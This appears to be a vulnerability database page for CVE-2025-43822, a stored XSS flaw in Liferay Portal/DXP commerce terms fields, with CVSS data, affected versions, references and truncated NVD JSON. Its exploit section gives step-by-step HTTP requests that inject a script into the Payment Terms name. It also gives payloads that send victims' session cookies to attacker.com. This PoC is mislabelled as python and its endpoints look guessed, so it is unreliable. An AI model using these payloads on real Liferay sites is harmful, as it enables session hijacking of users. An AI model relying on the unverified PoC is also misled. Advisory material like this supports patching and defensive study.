CVE-2025-43822

Description

Multiple stored cross-site scripting (XSS) vulnerabilities in Liferay Portal 7.4.3.15 through 7.4.3.111, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, and 7.4 update 15 through update 92 allow remote attackers to inject arbitrary web script or HTML via crafted payload injected into a Terms and Condition's Name text field to (1) Payment Terms, or (2) the Delivery Term on the view order page.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:digital_experience_platform:7.4:update15:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:digital_experience_platform:7.4:update16:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:digital_experience_platform:7.4:update17:*:*:*:*:*:* - VULNERABLE

Liferay Portal 7.4.3.15 - 7.4.3.111

Liferay DXP 2023.Q4.0 - 2023.Q4.5

Liferay DXP 2023.Q3.1 - 2023.Q3.8

Liferay DXP 7.4 update 15 - update 92

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-43822 PoC: Stored XSS in Liferay Portal/DXP Terms and Conditions -->
<!-- Vulnerability: Payment Terms and Delivery Term Name fields -->

<!-- Step 1: Authenticate as a low-privilege user -->
POST /c/portal/login HTTP/1.1
Host: target-liferay-instance.com
Content-Type: application/x-www-form-urlencoded

login=<username>&password=<password>&_com_liferay_portal_security_auth_http_portal_LoginPortlet_redirect=%2F

<!-- Step 2: Inject malicious payload into Payment Terms Name field -->
POST /group/control_panel/manage HTTP/1.1
Host: target-liferay-instance.com
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=<session_cookie>

_com_liferay_commerce_frontend_internal_portlet_CommerceTermsPortlet_formDate=1234567890000
&_com_liferay_commerce_frontend_internal_portlet_CommerceTermsPortlet_name=<script>alert('XSS-'+document.cookie)</script>
&_com_liferay_commerce_frontend_internal_portlet_CommerceTermsPortlet_type=payment-terms
&_com_liferay_commerce_frontend_internal_portlet_CommerceTermsPortlet_active=true
&p_p_id=com_liferay_commerce_frontend_internal_portlet_CommerceTermsPortlet

<!-- Alternative payload for Delivery Term on view order page -->
<!-- Payload: <img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)"> -->
<!-- Payload: <svg onload="document.location='https://attacker.com/?cookie='+document.cookie"> -->

<!-- Step 3: When victim visits view order page, the stored XSS executes -->
GET /web/guest/order/12345 HTTP/1.1
Host: target-liferay-instance.com
Cookie: JSESSIONID=<victim_session_cookie>

<!-- The malicious script in the Terms name will execute in the victim's browser context -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-43822
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-43822
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-43822/
[4] VulDB https://vuldb.com/cve/CVE-2025-43822
[5] https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-43822

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-43822", "sourceIdentifier": "[email protected]", "published": "2025-10-07T23:15:33.770", "lastModified": "2025-12-15T18:09:21.070", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple stored cross-site scripting (XSS) vulnerabilities in Liferay Portal 7.4.3.15 through 7.4.3.111, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, and 7.4 update 15 through update 92 allow remote attackers to inject arbitrary web script or HTML via crafted payload injected into a Terms and Condition's Name text field to (1) Payment Terms, or (2) the Delivery Term on the view order page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q3.1", "versionEndExcluding": "2023.q3.9", "matchCriteriaId": "C3ED7CF1-6D8A-40F7-A009-F3A800F955BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q4.0", "versionEndExcluding": "2023.q4.6", "matchCriteriaId": "7C41E249-91C4-4B2D-A8D2-C953A463E14F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update15:*:*:*:*:*:*", "matchCriteriaId": "C929CF16-4725-492A-872B-0928FE388FC9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update16:*:*:*:*:*:*", "matchCriteriaId": "1B8750A1-E481-48D4-84F4-97D1ABE15B46"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update17:*:*:*:*:*:*", "matchCriteriaId": "454F8410-D9AC-481E-841C-60F0DF2CC25E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update18:*:*:*:*:*:*", "matchCriteriaId": "D1A442EE-460F-4823-B9EF-4421050F0847"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update19:*:*:*:*:*:*", "matchCriteriaId": "608B205D-0B79-4D1C-B2C1-64C31DB1896E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update20:*:*:*:*:*:*", "matchCriteriaId": "4427DC78-E80C-4057-A295-B0731437A99E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update21:*:*:*:*:*:*", "matchCriteriaId": "22B6B8C1-1FF3-41BC-9576-16193AE20CC7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update22:*:*:*:*:*:*", "matchCriteriaId": "DDA17F24-1A7E-4BEB-9C98-41761A2A36A2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update23:*:*:*:*:*:*", "matchCriteriaId": "3B062851-CE6B-44F4-8222-422EC9872EC3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update24:*:*:*:*:*:*", "matchCriteriaId": ... (truncated)